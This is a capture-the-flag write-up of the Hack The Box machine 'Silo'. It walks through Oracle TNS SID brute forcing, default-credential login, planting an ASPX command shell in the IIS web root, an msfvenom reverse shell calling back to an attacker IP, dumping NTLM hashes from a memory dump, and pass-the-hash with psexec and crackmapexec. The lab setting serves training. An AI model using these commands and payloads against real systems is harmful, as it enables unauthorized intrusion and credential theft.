Nmap Results
# Nmap 7.92 scan initiated Sun Aug 21 15:00:32 2022 as: nmap -T5 -p80,135,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 -A -oA scan-all -Pn 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-21T19:02:35
|_ start_date: 2022-08-21T18:59:31
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 12.52 ms 10.10.14.1
2 12.99 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 15:02:41 2022 -- 1 IP address (1 host up) scanned in 129.39 seconds
Service Enumeration
TCP/445
Test SMB for anonymous share enumeration.
smbclient -L //$target -U '' --option="client min protocol=core"
NT_STATUS_LOGON_FAILURE
The logon failure means we're going to need a credential to connect to SMB.
TCP/80

Gobuster Enumeration
gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r
/aspnet_client (Status: 403) [Size: 1233]
TCP/1521
nmap already ran the oracle-tns-version script on the port and fingerprinted it as Oracle TNS Listener 11.2.0.2.0. I'm not very familiar with this service, but there is a brief overview of testing it here.
Looking over the cheat sheet, the methodology for testing Oracle TNS Listener is:
- Get the version number
- Enumerate SIDs
- Test credentials
- Exploit
  - Remote Code Execution (RCE)
  - Get/Put files (possible RCE by putting a payload in the web root)
  - Possible privilege escalation on certain versions
Enumerate SIDs
Download the sids-oracle.txt file provided in the HackTricks cheat sheet. Then, let's use the suggested hydra command – with some modifications added by me – to brute force the SIDs.
hydra -V -L ./sids-oracle.txt -o found-sids.txt -s 1521 10.10.10.82 oracle-sid
cat ./found-sids.txt
[1521][oracle-sid] host: 10.10.10.82
[1521][oracle-sid] host: 10.10.10.82 login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82 login: PLSExtProc
[1521][oracle-sid] host: 10.10.10.82 login: XE

Test Credentials
I tested the offline cracking methodology described here in the cheat sheet. I found that the XE SID is the only SID that would return user hashes. Unfortunately, I don't have a super strong GPU to brute-force hashes, and the word list I used was not returning anything valid.
I am going to use the odat tool mentioned in the cheat sheet. A couple of dependencies were not installed, so I'm just noting here what I installed:
python3 -m pip install python-libnmap
python3 -m pip install pycryptodome
Now, we can get to work.
./odat.py --help
./odat.py passwordguesser --help
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --both-ul

Time to Exploit
We've completed all three prerequisites to exploit the target as discussed above:
- Get the version number
- Enumerate SIDs
  - Valid SID: XE
- Test credentials
  - Valid Credentials: scott/tiger
First, let's install the sqlplus client so we can connect to the database and double-check the credential.
sudo apt update
sudo apt install -y oracle-instantclient-sqlplus
# Set an environment variable so the sqlplus client
# can load the shared libraries
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib
# Add the environment variable to .zshrc so that
# it's set every time a shell opens
echo 'export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib' >> ~/.zshrc
Now, let's try connecting to the database.
sqlplus scott/tiger@10.10.10.82/XE 'as sysdba';

Exploit
Test Web Root Upload
Let's see if we can abuse the IIS web server to upload a shell and gain a foothold. First, let's see if we can upload a test.html file to the web root.
echo '<h1>Hello, world! From 0xBEN</h1>' > test.html
Now, we'll connect to the database as the administrator using the --sysdba flag and write the test.html file to the web root, C:\inetpub\wwwroot.
./odat.py utlfile --help
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' test.html test.html --sysdba

Upload Web Pseudo-shell
I am going to use this code as a template for my pseudo-shell. All credit goes to the author.

Download the code:
wget https://gist.githubusercontent.com/stasinopoulos/95ce3d164fec1d477f80ea3675be2021/raw/b2fdbda6798f015a452df37f792bbc2b99c97b06/ping.aspx -O cmd.aspx
Now, I'm going to change this line of code:
Before
psi.Arguments = "/c ping -n 2 " + arg;
After
psi.Arguments = "/c " + arg;
Now, let's upload the file to the web root.
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' cmd.aspx cmd.aspx --sysdba


Transfer a Reverse Shell
I used my pseudo-shell to run systeminfo and find out more about the target operating system. Using our pseudo-shell, let's create a reverse shell payload with msfvenom and transfer it to the target.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe
Now, we'll start an SMB server to host the file and execute it on the target.
smbserver.py -smb2support evil $PWD
sudo rlwrap nc -lnvp 443


Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: SILO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00115-23036-AA976
Original Install Date: 12/31/2017, 11:01:23 PM
System Boot Time: 8/28/2022, 1:33:39 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,086 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,491 MB
Virtual Memory: In Use: 1,308 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 149 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.82
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest Phineas
Local Groups
SILO\Access Control Assistance Operators
SILO\Administrators
SILO\Backup Operators
SILO\Certificate Service DCOM Access
SILO\Cryptographic Operators
SILO\Distributed COM Users
SILO\Event Log Readers
SILO\Guests
SILO\Hyper-V Administrators
SILO\IIS_IUSRS
SILO\Network Configuration Operators
SILO\Performance Log Users
SILO\Performance Monitor Users
SILO\Power Users
SILO\Print Operators
SILO\RDS Endpoint Servers
SILO\RDS Management Servers
SILO\RDS Remote Access Servers
SILO\Remote Desktop Users
SILO\Remote Management Users
SILO\Replicator
SILO\Users
SILO\ORA_DBA
SILO\WinRMRemoteWMIUsers__
Network Configurations
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 428
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 760
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING 1076
TCP 0.0.0.0:49160 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49161 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 1804
TCP 10.10.10.82:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:8080 0.0.0.0:0 LISTENING 1212
TCP 127.0.0.1:49156 0.0.0.0:0 LISTENING 1212
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 620
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1521 [::]:0 LISTENING 1212
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 428
TCP [::]:49153 [::]:0 LISTENING 760
TCP [::]:49154 [::]:0 LISTENING 828
TCP [::]:49155 [::]:0 LISTENING 904
TCP [::]:49159 [::]:0 LISTENING 1076
TCP [::]:49160 [::]:0 LISTENING 528
TCP [::]:49161 [::]:0 LISTENING 520
TCP [::]:49162 [::]:0 LISTENING 1804
Interesting Files
C:\Users\Phineas\Desktop\Oracle issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
NOTE: The password for the Dropbox file would not work for me, so I had to glance at a walkthrough for answers. Turns out there was an encoding issue causing the £ character to display as ?. The actual password is £%Hm8646uC$
Open the Dropbox link in your browser and enter the supplied password.
Privilege Escalation
We're provided with a SILO-20180105-221806.zip file from Dropbox. If you unzip it, you'll find a memory dump file (.DMP) that we need to analyze.

Reading the Crash Dump
Download Volatility
Use the Linux standalone executable; download and unzip the archive, then copy the binary into the working directory.
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cp volatility_2.6_lin64_standalone/volatility_2.6_lin64_standalone ./volatility
Analyze the Dump File
Using the systeminfo command output from before, we know we're dealing with a Microsoft Windows Server 2012 R2 Standard x64 operating system. This is critical to know, as it will enable Volatility to read the memory artifacts correctly.
# Show help message
./volatility --help
# List profiles (and other info)
./volatility --info
./volatility --info | grep 2012
# This command will take a bit to run
# Dump NTLM hashes from memory
./volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump

Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
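As an added example (not part of the original write-up), here is a small parser for the pwdump-style lines that Volatility's hashdump prints, together with the triage a defender applies to such output: it skips the banner line, splits each record into user, RID, LM and NT hash, and flags built-in accounts, stored LM hashes and the well-known NT hash of an empty password (the Guest line above). The sample text is the hashdump output quoted on this page.

```python
import re
from dataclasses import dataclass

# pwdump record: user:rid:lm_hash:nt_hash:::  (anything else, e.g. the banner, is skipped)
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# LM hash stored when LM hashing is disabled (the default on 2008/Vista and later)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string, i.e. an account with a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the hashdump output shown on this page, banner included
SAMPLE = """Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""


@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the password is also stored in the weak LM form
        return self.lm != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def builtin(self) -> bool:
        # RIDs below 1000 are reserved for built-in accounts (500 = Administrator, 501 = Guest)
        return self.rid < 1000


def parse_hashdump(text: str) -> list[HashEntry]:
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            entries.append(HashEntry(m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()))
    return entries


def triage(entries: list[HashEntry]) -> dict[str, list[str]]:
    """Return a per-user list of findings a defender would act on."""
    findings = {}
    for e in entries:
        notes = []
        if e.blank_password:
            notes.append("blank password")
        if e.lm_stored:
            notes.append("LM hash stored (weak)")
        if e.builtin:
            notes.append("built-in account (RID %d)" % e.rid)
        findings[e.user] = notes
    return findings


ENTRIES = parse_hashdump(SAMPLE)
```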
Pass the Hash
We'll practice this with a few options:
# pth-winexe
pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' //10.10.10.82 cmd.exe
# smbexec.py
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82'
# psexec.py
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82' cmd.exe
# CrackMapExec
# Create a payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe
# Host it with SMB server
smbserver.py -smb2support evil $PWD
# Start a listener
sudo rlwrap nc -lnvp 443
# Connect to SMB as the Administrator and run the payload from the SMB server on Kali
crackmapexec smb 10.10.10.82 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' --local-auth -x '\\10.10.14.2\evil\0xBEN_shell.exe'




Flags
C:\Users\Phineas\Desktop\user.txt
d51d472f0450de8c1cdb3e993dc309e6
C:\Users\Administrator\Desktop\root.txt
8643321264a1f5ea49f453ad7a392725